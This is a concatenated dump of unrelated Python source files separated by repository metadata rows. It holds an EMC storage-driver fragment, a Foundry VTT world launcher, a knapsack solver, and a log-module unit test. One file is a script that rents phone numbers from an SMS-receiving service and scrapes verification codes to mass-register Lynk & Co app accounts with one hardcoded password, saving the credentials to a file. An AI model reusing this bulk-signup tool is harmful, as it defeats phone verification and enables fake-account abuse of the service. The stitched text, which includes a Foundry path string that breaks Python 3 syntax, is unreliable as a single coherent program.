TheElement=theVolumeInstanceName,
InElements=[inVolumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error adding volume to composite volume. "
"Error is: %(error)s")
% {'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def create_composite_volume(
self, conn, elementCompositionService, volumeSize, volumeName,
poolInstanceName, compositeType, numMembers):
"""Create a new volume using the auto meta feature.
:param conn: the connection the the ecom server
:param elementCompositionService: the element composition service
:param volumeSize: the size of the volume
:param volumeName: user friendly name
:param poolInstanceName: the pool to bind the composite volume to
:param compositeType: the proposed composite type of the volume
e.g striped/concatenated
:param numMembers: the number of meta members to make up the composite.
If it is 1 then a non composite is created
:returns: rc
:returns: errordesc
"""
newMembers = 2
LOG.debug(
"Parameters for CreateOrModifyCompositeElement: "
"elementCompositionService: %(elementCompositionService)s "
"provisioning: %(provisioning)lu "
"volumeSize: %(volumeSize)s "
"newMembers: %(newMembers)lu "
"poolInstanceName: %(poolInstanceName)s "
"compositeType: %(compositeType)lu "
"numMembers: %(numMembers)s "
% {'elementCompositionService': elementCompositionService,
'provisioning': THINPROVISIONINGCOMPOSITE,
'volumeSize': volumeSize,
'newMembers': newMembers,
'poolInstanceName': poolInstanceName,
'compositeType': compositeType,
'numMembers': numMembers})
rc, job = conn.InvokeMethod(
'CreateOrModifyCompositeElement', elementCompositionService,
ElementName=volumeName,
ElementType=self.utils.get_num(THINPROVISIONINGCOMPOSITE, '16'),
Size=self.utils.get_num(volumeSize, '64'),
ElementSource=self.utils.get_num(newMembers, '16'),
EMCInPools=[poolInstanceName],
CompositeType=self.utils.get_num(compositeType, '16'),
EMCNumberOfMembers=self.utils.get_num(numMembers, '32'))
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Volume: %(volumename)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'volumename': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
# Find the newly created volume
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
def create_new_composite_volume(
self, conn, elementCompositionService, compositeHeadInstanceName,
compositeMemberInstanceName, compositeType):
"""Creates a new composite volume.
Given a bound composite head and an unbound composite member
create a new composite volume.
:param conn: the connection the the ecom server
:param elementCompositionService: the element composition service
:param compositeHeadInstanceName: the composite head. This can be bound
:param compositeMemberInstanceName: the composite member.
This must be unbound
:param compositeType: the composite type e.g striped or concatenated
:returns: rc - return code
:returns: errordesc - descriptions of the error
"""
rc, job = conn.InvokeMethod(
'CreateOrModifyCompositeElement', elementCompositionService,
ElementType=self.utils.get_num('2', '16'),
InElements=(
[compositeHeadInstanceName, compositeMemberInstanceName]),
CompositeType=self.utils.get_num(compositeType, '16'))
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Creating new composite Volume Return code: %(rc)lu."
"Error: %(error)s")
% {'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def _migrate_volume(
self, conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName):
"""Migrate a volume to another pool.
:param conn: the connection to the ecom server
:param storageRelocationServiceInstanceName: the storage relocation
service
:param volumeInstanceName: the volume to be migrated
:param targetPoolInstanceName: the target pool to migrate the volume to
:returns: rc - return code
"""
rc, job = conn.InvokeMethod(
'RelocateStorageVolumesToStoragePool',
storageRelocationServiceInstanceName,
TheElements=[volumeInstanceName],
TargetPool=targetPoolInstanceName)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Migrating volume from one pool to another. "
"Return code: %(rc)lu. Error: %(error)s")
% {'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def migrate_volume_to_storage_pool(
self, conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName):
"""Given the storage system name, get the storage relocation service.
:param conn: the connection to the ecom server
:param storageRelocationServiceInstanceName: the storage relocation
service
:param volumeInstanceName: the volume to be migrated
:param targetPoolInstanceName: the target pool to migrate the
volume to.
:returns: rc
"""
LOG.debug(
"Volume instance name is %(volumeInstanceName)s. "
"Pool instance name is : %(targetPoolInstanceName)s. "
% {'volumeInstanceName': volumeInstanceName,
'targetPoolInstanceName': targetPoolInstanceName})
rc = -1
try:
rc = self._migrate_volume(
conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName)
except Exception as ex:
if 'source of a migration session' in six.text_type(ex):
try:
rc = self._terminate_migrate_session(
conn, volumeInstanceName)
except Exception as ex:
LOG.error(_LE("Exception: %s") % six.text_type(ex))
exceptionMessage = (_(
"Failed to terminate migrate session"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
try:
rc = self._migrate_volume(
conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName)
except Exception as ex:
LOG.error(_LE("Exception: %s") % six.text_type(ex))
exceptionMessage = (_(
"Failed to migrate volume for the second time"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
else:
LOG.error(_LE("Exception: %s") % six.text_type(ex))
exceptionMessage = (_(
"Failed to migrate volume for the first time"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def _terminate_migrate_session(self, conn, volumeInstanceName):
"""Given the volume instance terminate a migrate session.
:param conn: the connection to the ecom server
:param volumeInstanceName: the volume to be migrated
:returns: rc
"""
rc, job = conn.InvokeMethod(
'RequestStateChange', volumeInstanceName,
RequestedState=self.utils.get_num(32769, '16'))
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Terminating migrate session. "
"Return code: %(rc)lu. Error: %(error)s")
% {'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def create_element_replica(
self, conn, repServiceInstanceName, cloneName,
sourceName, sourceInstance, targetInstance):
"""Make SMI-S call to create replica for source element.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param cloneName: replica name
:param sourceName: source volume name
:param sourceInstance: source volume instance
:param targetInstance: target volume instance
:returns: rc - return code
:returns: job - job object of the replica creation operation
"""
if targetInstance is None:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=self.utils.get_num(8, '16'),
SourceElement=sourceInstance.path)
else:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=self.utils.get_num(8, '16'),
SourceElement=sourceInstance.path,
TargetElement=targetInstance.path)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Cloned Volume: "
"Volume: %(cloneName)s Source Volume:"
"%(sourceName)s. Return code: %(rc)lu. "
"Error: %(error)s")
% {'cloneName': cloneName,
'sourceName': sourceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def delete_clone_relationship(
self, conn, repServiceInstanceName, syncInstanceName,
cloneName, sourceName):
"""Deletes the relationship between the clone and source volume.
Makes an SMI-S call to break clone relationship between the clone
volume and the source
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param cloneName: replica name
:param sourceName: source volume name
:param sourceInstance: source volume instance
:returns: rc - return code
:returns: job - job object of the replica creation operation
"""
'''
8/Detach - Delete the synchronization between two storage objects.
Treat the objects as independent after the synchronization is deleted.
'''
rc, job = conn.InvokeMethod(
'ModifyReplicaSynchronization', repServiceInstanceName,
Operation=self.utils.get_num(8, '16'),
Synchronization=syncInstanceName)
LOG.debug("Break clone relationship: Volume: %(cloneName)s "
"Source Volume: %(sourceName)s Return code: %(rc)lu"
% {'cloneName': cloneName,
'sourceName': sourceName,
'rc': rc})
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error break clone relationship: "
"Clone Volume: %(cloneName)s "
"Source Volume: %(sourceName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'cloneName': cloneName,
'sourceName': sourceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def get_target_endpoints(self, conn, storageHardwareService, hardwareId):
"""Given the hardwareId get the
:param conn: the connection to the ecom server
:param storageHardwareService: the storage HardwareId Service
:param hardwareId: the hardware Id
:returns: rc
:returns: targetendpoints
"""
rc, targetEndpoints = conn.InvokeMethod(
'EMCGetTargetEndpoints', storageHardwareService,
HardwareId=hardwareId)
if rc != 0L:
exceptionMessage = (_("Error finding Target WWNs."))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(data=exceptionMessage)
return rc, targetEndpoints
| 42.731818 | 79 | 0.587987 | 2,464 | 28,203 | 6.657062 | 0.137175 | 0.01646 | 0.010608 | 0.031823 | 0.574529 | 0.532281 | 0.500701 | 0.458697 | 0.447357 | 0.427422 | 0 | 0.005087 | 0.337836 | 28,203 | 659 | 80 | 42.796662 | 0.873253 | 0.023863 | 0 | 0.585185 | 0 | 0 | 0.141538 | 0.023779 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.012346 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486d212547e00f7831ca70c40d4c968f71b4de71 | 4,575 | py | Python | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import threading
import time
import base64
from lynkco_app_request import lynkco_app_request
from com.uestcit.api.gateway.sdk.auth.aes import aes as AES
from sms_request import sms_request
import json
import sys
import os
import re
class lynco_regist_wrok(threading.Thread):
"""新开线程处理任务"""
def __init__(self, config):
# 初始化线程
threading.Thread.__init__(self)
# 缓存配置信息
self.config = config
self.project_id = self.config['sms_platform']['project_id']
self.max_count = int(self.config['sms_platform']['count'])
self.sms_request = sms_request()
# 缓存APPKEY(因为存储的是base64后的值,所以需要base64解码一次)
self.app_key = base64.b64decode(self.config['api_geteway']['app_key']).decode('utf-8')
# 缓存APPSECRET(因为存储的是base64后的值,所以需要base64解码一次)
self.app_secret = base64.b64decode(self.config['api_geteway']['app_secret']).decode('utf-8')
# 缓存AESKEY(因为存储的是两次base64后的值,所以需要base64解码两次)
self.aes_key = base64.b64decode(base64.b64decode(self.config['aes_key']).decode('utf-8')).decode('utf-8')
self.AES = AES(self.aes_key)
self.lynkco_app_request = lynkco_app_request(self.app_key, self.app_secret)
def run(self):
"""线程开始的方法"""
print ("开始注册任务 " + time.strftime('%Y-%m-%d %H:%M:%S'))
self.token = self.get_token()
if('' == self.token):
return 0
phone_list = []
while len(phone_list) < self.max_count:
phone = self.regist()
if('' == phone):
continue
phone_list.append({ 'username': phone, 'password': 'a123456789' })
with open(sys.path[0] + '/phone_list_' + time.strftime('%Y%m%d%H%M%S') + '.json', 'w') as json_file:
json_file.write(json.dumps(phone_list,ensure_ascii = False))
print ("注册执行完成任务 " + time.strftime('%Y-%m-%d %H:%M:%S'))
def get_token(self):
"""登录获取token"""
sms_username = self.config['sms_platform']['username']
sms_password = self.config['sms_platform']['password']
context = self.sms_request.login(sms_username, sms_password)
array = context.split('|')
if(int(array[0]) != 1):
print("短信账户登录失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
token = array[1]
print("短信账户登录成功,token:" + token + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return token
def regist(self):
"""App端操作流程"""
# 获取一个手机号
context = self.sms_request.get_phone(self.token, self.project_id)
array = context.split('|')
if(int(array[0]) != 1):
print("短信账户获取手机号失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
phone = array[1]
# 发送注册短信
response = self.lynkco_app_request.get_vcode_by_regist(phone)
if response['code'] != 'success':
print("发送注册短信失败" + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
# 循环10次获取短信内容,每次获取失败等待3秒钟
vcode = ''
fail_count = 0;
while fail_count < 10:
context = self.sms_request.get_phone_msg(self.token, self.project_id, phone)
array = context.split('|')
if(int(array[0]) != 1):
print("短信账户获取验证码内容失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
fail_count += 1
time.sleep(3)
else:
context = array[1]
# 此处需要正则取验证码
pattern = re.compile(r'\d{6}')
result = pattern.findall(context)
if(len(result) != 1):
print("短信账户解析验证码内容失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
else:
vcode = result[0]
print("短信账户获取验证码内容成功:" + vcode + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
break
if('' == vcode):
return ''
# 发送注册
password = self.AES.encrypt('a123456789')
response = self.lynkco_app_request.regist(phone, password, vcode)
if response['code'] != 'success':
print("发送注册接口失败" + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
# 尝试登陆一次
response = self.lynkco_app_request.login(phone, password)
if response['code'] != 'success':
print("尝试接口失败" + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return phone
return phone | 39.782609 | 113 | 0.551257 | 535 | 4,575 | 4.571963 | 0.250467 | 0.058872 | 0.063778 | 0.068684 | 0.32175 | 0.237531 | 0.213818 | 0.182747 | 0.153312 | 0.091169 | 0 | 0.022936 | 0.285246 | 4,575 | 115 | 114 | 39.782609 | 0.725076 | 0.055956 | 0 | 0.202247 | 0 | 0 | 0.136427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0.067416 | 0.11236 | 0 | 0.269663 | 0.123596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4875786274d1dcdef100393c55e236d7510c92a2 | 10,457 | py | Python | Foundry_Manager_v2.py | MrVauxs/Foundry-Selection-Menu | 13f9164595c3c11fe01e5d44cd35bcc79b6a34df | [
"MIT"
] | 5 | 2020-09-26T10:16:17.000Z | 2022-01-06T14:31:54.000Z | Foundry_Manager_v2.py | MrVauxs/Foundry-Selection-Menu | 13f9164595c3c11fe01e5d44cd35bcc79b6a34df | [
"MIT"
] | null | null | null | Foundry_Manager_v2.py | MrVauxs/Foundry-Selection-Menu | 13f9164595c3c11fe01e5d44cd35bcc79b6a34df | [
"MIT"
] | 1 | 2020-09-07T23:36:17.000Z | 2020-09-07T23:36:17.000Z | import requests
from bottle import route, run, template,ServerAdapter,redirect
import subprocess
from html.parser import HTMLParser
import threading
import time
ssl_cert=None #XYZ - 'fullchain.pem'
ssl_key=None #XYZ - 'privkey.pem'
world_mapping={"URL_Path":["world-folder","Name To Be Shown"], "URL_Path2":["world-folder-2","Name To Be Shown Two: Electric Boogaloo"]} #XYZ - Repeatable until the HTML page doesn't handle it.
foundry_base="http://blank.com" #XYZ
foundry_port=30000 #XYZ
foundry_url=foundry_base+":"+str(foundry_port)
foundry_directory="C:\Program Files\FoundryVTT" #XYZ - The directory has to point to /resources/app
idle_logout=300 #XYZ- Seconds - time to shut down foundry if at login screen and 0 users
##Populate this automatically from module configuration, can probably get pictures etc but who has time?
class SSLWrapper(ServerAdapter):
def __init__(self, ssl_certfile = None, ssl_keyfile = None, host='0.0.0.0', port=8080):
self._ssl_certfile = ssl_certfile
self._ssl_keyfile = ssl_keyfile
super().__init__(host, port)
def run(self, handler):
from cheroot.ssl.builtin import BuiltinSSLAdapter
from cheroot import wsgi
server = wsgi.Server((self.host, self.port), handler)
self.srv = server
if server.ssl_adapter is not None:
server.ssl_adapter = BuiltinSSLAdapter(self._ssl_certfile, self._ssl_keyfile)
try:
server.start()
finally:
server.stop()
def shutdown(self):
self.srv.stop()
class AwfulScrape_nPlayers(HTMLParser):
#This is why javascript was invented
def __init__(self):
super().__init__()
self.in_label=False #We are searching for a "Current Players:" label
self.previous_label_players=False #If we found it, grab the first input field
self.nPlayers=None #If nothing is found crash
def handle_starttag(self, tag, attrs):
if tag == "label":
self.in_label=True
if (tag == "input") and self.previous_label_players:
self.nPlayers=int(dict(attrs)["value"])
self.previous_label_players=False
def handle_endtag(self, tag):
if tag == "label":
self.in_label=False
if tag == "header":
self.in_header=False
def handle_data(self, data):
if self.in_label:
if "Current Players" in data:
self.previous_label_players=True
else:
self.previous_label_players=False
## A bunch of threading stuff
class monitorPlayers(object):
def __init__(self, foundry_proccess):
self.foundry_proccess = foundry_proccess
thread = threading.Thread(target=self.run, args=())
thread.daemon = False
thread.start()
def run(self):
#Keep checking number of players
#If it's been 0 for 5 minutes, return to setup
zero_players=False
while True:
n_players=get_logged_in_players(timeout=30.) #Returns "None" if in setup etc so it's safe
if (n_players == 0) and zero_players:
self.foundry_proccess.send_signal(2)
self.foundry_proccess.send_signal(2) ##I think I need to send this twice?
self.foundry_proccess.wait()
break
time.sleep(idle_logout) #Wait five minutes
if n_players == 0:
zero_players=True
else:
zero_players=False
server.start()
class runServer(object):
def __init__(self):
self.server=SSLWrapper(ssl_certfile = ssl_cert, ssl_keyfile = ssl_key,port=foundry_port)
thread = threading.Thread(target=self.run, args=([self.server]))
thread.daemon = False
thread.start()
def run(self,server):
run(server=server) ##This isn't a cruel practical joke - the second run refers to bottle.run (I'll remove the uglyness in the future)
class bottleManager: #this is bascially just a global variable
def __init__(self):
self.bottle_server=runServer()
def shutdown(self):
self.bottle_server.server.shutdown()
self.bottle_server = None
def start(self):
self.bottle_server=runServer()
class startFoundryWorld(object):
def __init__(self, world):
self.world = world
thread = threading.Thread(target=self.run, args=([world]))
thread.daemon = False
thread.start()
def run(self,world):
server.shutdown()
process_obj= subprocess.Popen(["node","main.js","--port=30000", "--dataPath=C:\Users\XYZ\AppData\Local\FoundryVTT\Data","--world=%WORLD%".replace("%WORLD%",world)],cwd=foundry_directory) #XYZ - The --dataPath MUST direct to the FoundryVTT data folder (where worlds reside)
import time
time.sleep(12)
monitorPlayers(process_obj)
def get_logged_in_players(timeout=0.1):
r=requests.get(foundry_url+"/join",timeout=timeout)
par=AwfulScrape_nPlayers()
par.feed(r.text)
return par.nPlayers
def _get_world_url(item):
return "<p> > <a href='/"+item[0]+"' >" + item[1][1]+"</a> </p>"
@route('/')
@route('/<world>')
def index(world=None):
if (world == "join") or (world is None):
return """<!DOCTYPE html>
<html>
<title>Foundry World Select</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Signika">
<style>
body,h1 {font-family: "Signika", sans-serif}
body, html {height: 100%;
background-color: #3f403f;}
.bgimg {
min-height: 100%;
background-position: center;
background-size: cover;
}
</style>
<body>
<div class="bgimg w3-display-container w3-animate-opacity w3-text-white">
<div class="w3-display-topleft w3-padding-large w3-xlarge">
Welcome to Dlivitz & Vauxs Foundry Selection Screen!
</div>
<div class="w3-display-middle">
<h1 class="w3-jumbo w3-animate-top"> <strong> """+"".join([_get_world_url(x) for x in world_mapping.items()]) +""" </strong></h1>
<hr class="w3-border-grey" style="margin:auto;width:40%">
<p class="w3-large w3-center">This will start your selected world and you will be able to login.</p>
</div>
</div>
</body>
</html>
"""
requested_world_path,requested_world = world_mapping.get(world,[None,None])
if requested_world is None:
return template('<h1>Cannot find world <b> {{world}} </b></h1>',world=world)
startFoundryWorld(requested_world_path)
return """<!DOCTYPE html>
<html>
<title>Foundry World Select</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Signika">
<style>
body,h1 {font-family: "Signika", sans-serif}
body, html {height: 100%;
background-color: #3f403f;}
.bgimg {
min-height: 100%;
background-position: center;
background-size: cover;
}
@keyframes blink {
/**
* At the start of the animation the dot
* has an opacity of .2
*/
0% {
opacity: .2;
}
/**
* At 20% the dot is fully visible and
* then fades out slowly
*/
20% {
opacity: 1;
}
/**
* Until it reaches an opacity of .2 and
* the animation can start again
*/
100% {
opacity: .2;
}
}
.saving span {
/**
* Use the blink animation, which is defined above
*/
animation-name: blink;
/**
* The animation should take 1.4 seconds
*/
animation-duration: 1.4s;
/**
* It will repeat itself forever
*/
animation-iteration-count: infinite;
/**
* This makes sure that the starting style (opacity: .2)
* of the animation is applied before the animation starts.
* Otherwise we would see a short flash or would have
* to set the default styling of the dots to the same
* as the animation. Same applies for the ending styles.
*/
animation-fill-mode: both;
}
.saving span:nth-child(2) {
/**
* Starts the animation of the third dot
* with a delay of .2s, otherwise all dots
* would animate at the same time
*/
animation-delay: .2s;
}
.saving span:nth-child(3) {
/**
* Starts the animation of the third dot
* with a delay of .4s, otherwise all dots
* would animate at the same time
*/
animation-delay: .4s;
}
</style>
<body>
<div class="bgimg w3-display-container w3-animate-opacity w3-text-white">
<div class="w3-display-topleft w3-padding-large w3-xlarge">
Enjoy your game!
</div>
<div class="w3-display-middle">
<h1 class="w3-jumbo w3-animate-top"> <strong><p class="saving">Loading <span>.</span><span>.</span><span>.</span></p> </strong></h1>
</div>
</div>
</body>
<script>
var timer = setTimeout(function() {
window.location='"""+foundry_url+"""'
}, 12000);
</script>
</html>
""" #XYZ - Edit the scripts 12000 milisecond timer depending on your machine.
# This value determines how long the page waits before refreshing and hopefully redirecting the user to the Foundry login page
# (if it's too fast, the page will break and you will have to refresh until Foundry is turned on, too long... you just waste time.)
server=bottleManager()
| 33.516026 | 280 | 0.589557 | 1,281 | 10,457 | 4.712724 | 0.314598 | 0.009276 | 0.010933 | 0.019877 | 0.308597 | 0.264038 | 0.247143 | 0.228259 | 0.209376 | 0.209376 | 0 | 0.018476 | 0.29607 | 10,457 | 311 | 281 | 33.623794 | 0.801657 | 0.118772 | 0 | 0.430894 | 0 | 0.03252 | 0.491782 | 0.041145 | 0.004065 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036585 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
48769d3fe736152c54bf8b09ad3360ea09bd2080 | 1,181 | py | Python | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null |
"""
TAG: 0-1 Knapsack Problem, Dynamic Programming (DP), O(nW)
References:
- https://www.geeksforgeeks.org/0-1-knapsack-problem-dp-10/
weights and values of n items, capacity -> max value
"""
N, W = map(int, input().split()) # number of items, capacity
weights = []
values = []
for i in range(N):
w, v = map(int, input().split())
weights.append(w)
values.append(v)
def knapsack(W, weights, values, n):
dp = [[0 for x in range(W+1)] for x in range(n+1)]
for i in range(n+1):
for w in range(W+1):
if i == 0 or w == 0:
dp[i][w] = 0
elif weights[i-1] <= w:
dp[i][w] = max(values[i-1] + dp[i-1][w - weights[i-1]], dp[i-1][w])
else:
dp[i][w] = dp[i-1][w]
return dp[n][W]
print(knapsack(W, weights, values, N))
# Naive
"""
def knapsack(W, weights, values, n):
if n == 0 or W == 0: # base
return 0
if (weights[n-1] > W):
return knapsack(W, weights, values, n-1)
else:
return max(
values[n-1] + knapsack(W - weights[n-1], weights, values, n-1),
knapsack(W, weights, values, n-1)
)
"""
| 21.87037 | 83 | 0.516511 | 191 | 1,181 | 3.193717 | 0.246073 | 0.02623 | 0.157377 | 0.180328 | 0.337705 | 0.239344 | 0 | 0 | 0 | 0 | 0 | 0.035237 | 0.303133 | 1,181 | 53 | 84 | 22.283019 | 0.705954 | 0.187976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
487c49f921ee4340fdfc140e8ff73bccf0d40cf6 | 3,273 | py | Python | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | 1 | 2019-01-11T22:22:06.000Z | 2019-01-11T22:22:06.000Z | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011, Martín Raúl Villalba
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
##############################################################################
LOG_LOCATION = '/tmp/python-ant.logtest.ant'
import unittest
from ant.core.log import *
class LogReaderTest(unittest.TestCase):
def setUp(self):
lw = LogWriter(LOG_LOCATION)
lw.logOpen()
lw.logRead(b'\x01')
lw.logWrite(b'\x00')
lw.logRead(b'TEST')
lw.logClose()
lw.close()
self.log = LogReader(LOG_LOCATION)
def test_open_close(self):
self.assertTrue(self.log.is_open)
self.log.close()
self.assertFalse(self.log.is_open)
self.log.open(LOG_LOCATION)
self.assertTrue(self.log.is_open)
def test_read(self):
t1 = self.log.read()
t2 = self.log.read()
t3 = self.log.read()
t4 = self.log.read()
t5 = self.log.read()
self.assertEquals(self.log.read(), '')
self.assertEquals(t1[0], EVENT_OPEN)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t1), 2)
self.assertEquals(t2[0], EVENT_READ)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t2), 3)
self.assertEquals(t2[2], b'\x01')
self.assertEquals(t3[0], EVENT_WRITE)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t3), 3)
self.assertEquals(t3[2], '\x00')
self.assertEquals(t4[0], EVENT_READ)
self.assertEquals(t4[2], 'TEST')
self.assertEquals(t5[0], EVENT_CLOSE)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t5), 2)
class LogWriterTest(unittest.TestCase):
def setUp(self):
self.log = LogWriter(LOG_LOCATION)
def test_open_close(self):
self.assertTrue(self.log.is_open)
self.log.close()
self.assertFalse(self.log.is_open)
self.log.open(LOG_LOCATION)
self.assertTrue(self.log.is_open)
def test_log(self):
# Redundant, any error in log* methods will cause the LogReader test
# suite to fail.
pass
